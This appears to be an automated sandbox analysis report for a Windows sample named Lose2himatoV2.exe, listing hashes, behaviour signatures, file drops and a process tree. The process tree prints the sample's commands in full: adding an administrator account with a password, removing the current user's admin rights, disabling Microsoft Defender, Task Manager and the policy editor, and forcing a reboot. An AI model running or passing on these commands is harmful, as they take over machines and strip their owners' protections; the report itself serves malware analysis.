Analysis
-
max time kernel
70s -
max time network
75s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
-
submitted
04-01-2025 22:39
Errors
General
-
Target
Lose2himatoV2.exe
-
Size
138.5MB
-
MD5
b13b58171063faf469d7cffd178644a6
-
SHA1
0cc178b5db25710be4181e0f15b70ca8c3049ef2
-
SHA256
974cb763c5670a8c187c5e7108964741b8c59590ac35f3bdccb2e069e2ec7506
-
SHA512
511d96d59fc5646aead6f0bf16ecbe9f9e1ab60e05954b02d2b53c7686df2ccfe85374388fc5aece04e50bd37ff3411319c7107d52cc33c3af819fb47ab570e3
-
SSDEEP
786432:Y93oFjO6NbbB6uTE/kbsV0jmB/gWD4otJ0njnEMIQAhpLoMS/QVQfmLh0VPdTtLH:Y9SjOsbbUng40ihpEX/QVQfmLmxHXutU
Malware Config
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Disables Task Manager via registry modification
-
Indicator Removal: Network Share Connection Removal 1 TTPs 1 IoCs
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Detected potential entity reuse from brand PAYPAL.
-
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
System Location Discovery: System Language Discovery 1 TTPs 29 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies data under HKEY_USERS 15 IoCs
-
Modifies registry class 2 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 14 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of FindShellTrayWindow 26 IoCs
-
Suspicious use of SendNotifyMessage 12 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Lose2himatoV2.exe"C:\Users\Admin\AppData\Local\Temp\Lose2himatoV2.exe"1⤵
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net user Lose2himato /add2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet user Lose2himato /add3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user Lose2himato /add4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net user Lose2himato dumbass2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet user Lose2himato dumbass3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user Lose2himato dumbass4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net localgroup Administrators "Lose2himato" /add2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet localgroup Administrators "Lose2himato" /add3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators "Lose2himato" /add4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net localgroup Administrators "%USERNAME%" /delete2⤵
- Indicator Removal: Network Share Connection Removal
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet localgroup Administrators "Admin" /delete3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators "Admin" /delete4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\explorer.exe"explorer.exe"2⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\MySingleFileApp\wallpaper.bmp /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\MySingleFileApp\wallpaper.bmp /f3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v WallpaperStyle /t REG_SZ /d 3 /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v WallpaperStyle /t REG_SZ /d 3 /f3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\reg.exeREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableGpedit /t REG_DWORD /d 1 /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableGpedit /t REG_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start https://x.com/Lose2hxm4to2⤵
- System Location Discovery: System Language Discovery
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://x.com/Lose2hxm4to3⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd85d83cb8,0x7ffd85d83cc8,0x7ffd85d83cd84⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1456,11295849031551944264,3405504641452223267,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1828 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start https://discord.gg/UkEYppsAck2⤵
- System Location Discovery: System Language Discovery
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/UkEYppsAck3⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd85d83cb8,0x7ffd85d83cc8,0x7ffd85d83cd84⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1876,578736593612576395,10816648138766943229,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1904 /prefetch:24⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1876,578736593612576395,10816648138766943229,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2024 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start https://www.paypal.com/paypalme/himato6662⤵
- System Location Discovery: System Language Discovery
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/paypalme/himato6663⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd85d83cb8,0x7ffd85d83cc8,0x7ffd85d83cd84⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1712,10851167696776916878,18408555154760778915,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1892 /prefetch:24⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1712,10851167696776916878,18408555154760778915,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1712,10851167696776916878,18408555154760778915,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2792 /prefetch:84⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1712,10851167696776916878,18408555154760778915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1712,10851167696776916878,18408555154760778915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1712,10851167696776916878,18408555154760778915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3064 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1712,10851167696776916878,18408555154760778915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4040 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1712,10851167696776916878,18408555154760778915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5388 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1712,10851167696776916878,18408555154760778915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5360 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1712,10851167696776916878,18408555154760778915,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4044 /prefetch:84⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1712,10851167696776916878,18408555154760778915,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=4012 /prefetch:84⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1712,10851167696776916878,18408555154760778915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6496 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1712,10851167696776916878,18408555154760778915,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6804 /prefetch:84⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1712,10851167696776916878,18408555154760778915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6820 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1712,10851167696776916878,18408555154760778915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5840 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1712,10851167696776916878,18408555154760778915,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5304 /prefetch:84⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1712,10851167696776916878,18408555154760778915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6384 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1712,10851167696776916878,18408555154760778915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6708 /prefetch:14⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c shutdown /r2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\shutdown.exeshutdown /r3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\PickerHost.exeC:\Windows\System32\PickerHost.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa3a39855 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
Indicator Removal
1Network Share Connection Removal
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
152B
MD5f1d2c7fd2ca29bb77a5da2d1847fbb92
SHA1840de2cf36c22ba10ac96f90890b6a12a56526c6
SHA25658d0f80310f4a84f687c5ce0adaa982eb42fe4480510399fa2ae975d40bb8bc5
SHA512ede1fafea2404f16948fe0b5ea5161ccee3ee6e40c55ff98c337eac981a6776b9c73dc030a5c59e4347aec91259f497539206e71949c33adcecbf2c846709e14
-
Filesize
152B
MD54c1a24fa898d2a98b540b20272c8e47b
SHA13218bff9ce95b52842fa1b8bd00be073177141ef
SHA256bbcc378fcbf64580e7a48b4e7ca9be57fa0a1f2e747f488325685bdb18d73a95
SHA512e61f196e7f1c9a5fe249abe9b11eea770fb2f4babc61f60b12c71f43e6fe9354cf14869daf46abc2c2655bce180252acd43c10562a2dcd31fa7d90d33253820e
-
Filesize
7KB
MD50a55c5bb9dc7f9b3a0d8eabead9419b4
SHA16385e9653ee40b964530f46f4d55fec192bf7d53
SHA25622a6b4f0bfe4d6efc8302d9888135184749febc096d1b3cc2f97c882d5057333
SHA512e6473afa86acf5ecfbe4ae83c54ca3bda0770a2a50a223a7f8b854750bad23726105fb88bd720833ef0ed7519f89ce5af4340863329c171e835194e17337490b
-
Filesize
4KB
MD5baf14c3a570acb5af4503476baed375d
SHA123c1efe995f6aaa3cf9835c3a4c8bf4bed990c87
SHA2562deaac2a2a62a6a30ecb0ff94bae4504e24c3f1d0741528261db58a59516e6a9
SHA512bfc49267b57059992dda87c1ed3731a5e7538b878557a12f7f260a59b4f20ccf1d6acad1a52d17308224942c956e590fb0f543cf43652c9e6ae1c390a2971c2f
-
Filesize
4KB
MD51da77040015bff89831f4567cc7e4aa5
SHA10641c191fd669885c8e802722b26f8d7f6083486
SHA2569088477b3c58b514fb111cb6e2becf3fb86b7e8a195e9cef469f0bc4eeda697f
SHA51278b96c53f5a98eb71e2dea9f0abc941ddb90b9e3b35efd8d9c864e56e824395f18eabe7d85581621b2fceee013c3386c58e325032c5ba7a55a044e024e40d53d
-
Filesize
2KB
MD5176b5e7b178824ac5d79c77684e4e1b9
SHA11ffb905bc2361f08059b8fd20f22a8ad620412a2
SHA25629184626dfbf61839a1ef3c7365baa45088bfa0bfceb7fd513de1c2e47a07906
SHA512bef6991dc7a53cb41c6e9f144d91f76d74720f7fc6d5d03aa0f73bb6ebf2e12b6f0e18fa49e1a207a722bc2dfa002af87bf862efe6407216e8292f671a810e06
-
Filesize
5KB
MD561679c95ae65c44e5942a90e66e1b3c7
SHA1d508ce118f1ab269723f12364c32d7c234f28b44
SHA25657fefcb0c2bed8bca6ebaf8b8f504ac4063bdb0056108e543446d23e309cfc86
SHA51269e49221d77a1ff895b097674c20c994ff4359ee98d6fcc1f6f05cce7a97aceb2f6416ee794e7d1606f9ee4d585a4465ad3a72bbdf615a4c5b472f6b2c3a1a0b
-
Filesize
8KB
MD5be9c895b73f0a5c0f4ffcdfc46915c9a
SHA123e94693e6381aad6ba57237470cecd8c6dc6499
SHA2560c0b5c1a0e6f456d7d9a6a3aaedd1e5f2cdccf3fc9b2aab7acf77217bfe11fd5
SHA512eb63852e344c517dbfeeb2eebdfccef4cf54d039c50f7824cd19015e4e3693f277a38da9b67919a8e55b5ed2d405163372bb3d5ea1f52d7de96070f2a5f3f1b3
-
Filesize
7KB
MD5e8fc98b5599df2f1aa63c23a3b27dd1d
SHA1929ca7442d1014e9f133f79043905614743f38dc
SHA2564458600660f36d40676cdb4d8915567ecbcb03db2aebfac9bbe4536edec049c1
SHA51213ec2a519eef87d5a1d93f6b815d0c38913ce55c0a0b0e756589523b3aa46f51b5fcf5eb181750de356d82e8c7a4bf73f2fcd460b92e43594b8d7ef76e4c93d9
-
Filesize
2KB
MD56e482ee34ad997600a4a15f4e7b88fda
SHA1ae954e1a54b9e9c9e8076e890b33402b5a5fefd1
SHA2563087d0e9d0df206282c98cf85ee85d7145adb6cb50d075d5c15eafdc0747526c
SHA512a140a044e337590c1a6ab5901367137e27c5dd4bb190652b48981ad481c6c6e09f3299bf3668da1f9f21697e9777b4f151079a07083e68338a0cdc3ed64e554a
-
Filesize
2KB
MD50248f6bcb426dd76cbca7b03d63d59ac
SHA18157e4b134ea6384fa62859e6bdaa21ded7267e9
SHA256e2bd92ed671d8ff2be91fbefaf8113b4912fe6c221b1149fa48672dc099bfae7
SHA5122b0389bb1d82af960940d6b89305cb502dea53fee28199b96c807b5684b9af65fc9092ed7e3f30dd318a35e44af418a1d5f25f3abf4a4e130647be120c9dfcdd
-
Filesize
2KB
MD5a30ab5814cb54db328cc99041b7bd678
SHA1b7987dc2c7934d9a7d006610a126e0d249d84e82
SHA256ae09beb86a31fa91e9323fbb6c8623c7f5ccbe0294651ad1124f87ea2cc3d432
SHA512cd34bfe367d25e2774d267a6543cf30093a83122f1a5fe9bc8389e2afff9619375a53b7792d316826d4673f6cb42086566e0706685dea84528db2c6a89ce2ecc
-
Filesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
Filesize
16B
MD5206702161f94c5cd39fadd03f4014d98
SHA1bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA2561005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA5120af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145
-
Filesize
8KB
MD56336116d0bbdd03f2c42e781b71db5b3
SHA1c62440166db0172d46e2f3c232152d9d023009cc
SHA256d51001e5cb9994f10e6404645b848a191992465966e9332fc499b4240e6d5a37
SHA512ebf049bbb565628ad2254602b962bb9c90c21e732f61460f7ad5f247097348baac9d75c1dea172e8465fcf8ad9fbc28954792181d99cc08ad91c2bece0085143
-
Filesize
8KB
MD599a3e37cb70011c4286ee5e137984c69
SHA1b9ccab2e081f1379479a0d50c85584a973fb443e
SHA25650437dbee798552d6486553f4fe052d80d898265ea45f37978b4b01e4647cf44
SHA5126dd5383aac4c86dffdd0ce2f0535578a8afe2d968a046e1cc375c3b5fa1669cc3c1ec414f56d1d0c451e6bc69be11ecc762ae6b8b448256905741a8daa7ddda7
-
Filesize
10KB
MD538d124252b51305ba88b8ee030055445
SHA14a369984e90624764d30106c1eb706a9d8fd11c3
SHA2563b93b71b01c5a302308aed3121bda3b5eb390aca4298c62aea2c4a1769ffdfdf
SHA512da27d2c3f06cc4f4163554ad3bc16e4d6e064a3d7a65e175080944ab2468ba207fcbd97c7f2671f213d91a2c128abfb79a315b906d183c602a9f3d9814aee522
-
Filesize
10KB
MD5f8b2d55168ae1d6269fece4ac0dda95a
SHA1c7af413c5ff462293609ea99b259ea02f2b48c58
SHA2562e4b26f3be16a6102704348a798fe784bea4acfa52182fa644e7b7175558df3c
SHA5126b95de789eab60ef505111c553372a0411e8e811ad6944de479b2034b555332928b5e9d47e3947a1c285984cafc4b307fa4d975f90ad6ab541160fb093510ce0
-
Filesize
10KB
MD59cdcdc8958486cefaf94dd2c14ce9a76
SHA18507b913830fb8afedc54d5d56019d6a7ceb243a
SHA256cba0f0323012f1f7858895c4e3be00e06bb888d8252de282f8a2cf57e9673d1d
SHA512ea1a4e679cf376d6294b9631b2580d6e780115e53e5b8fd477781fe4ab9a34fcd1c383e32345e3c12cc421ed22944a980e1d20fd5669b2284a6ded9f832952d5
-
Filesize
72KB
-
Filesize
76KB
-
Filesize
24KB
-
Filesize
24KB
-
Filesize
48KB
-
Filesize
720KB
-
Filesize
48KB
-
Filesize
76KB
-
Filesize
4KB
-
Filesize
720KB
-
Filesize
232KB
-
Filesize
124KB
-
